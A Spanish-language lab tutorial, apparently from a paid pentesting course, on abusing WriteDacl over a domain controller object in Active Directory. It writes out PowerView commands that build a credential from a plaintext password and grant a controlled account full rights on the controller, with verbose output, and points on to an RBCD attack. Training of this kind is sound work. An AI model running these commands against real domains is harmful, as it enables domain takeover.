WriteDacl sobre Computador

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: https://wa.link/ej3kiu. ¡Te esperamos para empezar este viaje juntos!

Primero vamos a impersonar el usuario writedacldc.user desde el equipo llamado USER-SERVER:

Se recomienda realizar lectura sobre impersonation

PS C:\Users\admin\Desktop> Import-Module .\PowerView-3.0.ps1

PS C:\Users\admin\Desktop> $SecPassword = ConvertTo-SecureString 'Password@1' -AsPlainText -Force

PS C:\Users\admin\Desktop> $Cred = New-Object System.Management.Automation.PSCredential('spartancybersec.corp\writedacldc.user', $SecPassword)

Despues de lo anterior, vamos a utilizar el siguiente comando para asignar todos los privilegios sobre el usuario user.hacked desde la sesion previa de writedacldc.user

PS C:\Users\admin\Desktop> Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'CN=FIRST-DC,OU=Domain Controllers,DC=spartancybersec,DC=corp' -PrincipalIdentity user.hacked -Rights All -Verbose
VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'spartancybersec.corp' from -Credential
VERBOSE: [Get-DomainSearcher] search base: LDAP://First-DC.spartancybersec.corp/DC=spartancybersec,DC=corp
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=user.hacked)(name=user.hacked)(dnshostname=user.hacked))))
VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'spartancybersec.corp' from -Credential
VERBOSE: [Get-DomainSearcher] search base: LDAP://First-DC.spartancybersec.corp/DC=spartancybersec,DC=corp
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Extracted domain 'spartancybersec.corp' from 'CN=FIRST-DC,OU=Domain Controllers,DC=spartancybersec,DC=corp'
VERBOSE: [Get-DomainSearcher] search base: LDAP://FIRST-DC.SPARTANCYBERSEC.CORP/DC=spartancybersec,DC=corp
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=FIRST-DC,OU=Domain Controllers,DC=spartancybersec,DC=corp)))
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=User Hacked,CN=Users,DC=spartancybersec,DC=corp 'All' on CN=FIRST-DC,OU=Domain Controllers,DC=spartancybersec,DC=corp
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=User Hacked,CN=Users,DC=spartancybersec,DC=corp rights GUID '00000000-0000-0000-0000-000000000000' on CN=FIRST-DC,OU=Domain
Controllers,DC=spartancybersec,DC=corp

Lo anterior, se puede apreciar graficamente con la siguiente ilustracion:

En resumen, el comando está otorgando permisos amplios al usuario user.hacked en un objeto específico de Controlador de Dominio en el dominio de Active Directory spartancybersec.corp, utilizando credenciales alternas proporcionadas.

Con los permisos 'All' otorgados al usuario user.hacked en un objeto específico del Controlador de Dominio en Active Directory, el usuario podría realizar una amplia gama de acciones, incluyendo:

  1. Modificar Configuraciones del Controlador de Dominio: Cambiar configuraciones críticas del Controlador de Dominio.

  2. Modificar Políticas de Grupo: Cambiar políticas que afectan a todos los usuarios y computadoras del dominio.

  3. Acceder a Datos Sensibles: Leer información sensible almacenada en el Controlador de Dominio.

  4. Crear o Eliminar Cuentas de Usuario: Potencialmente crear cuentas de administrador o eliminar cuentas existentes.

  5. Cambiar Permisos y Derechos de Otros Usuarios: Modificar los derechos de acceso de otros usuarios en el dominio.

Para este escenario, seria necesario continuarlo con el ataque RBCD.

Última actualización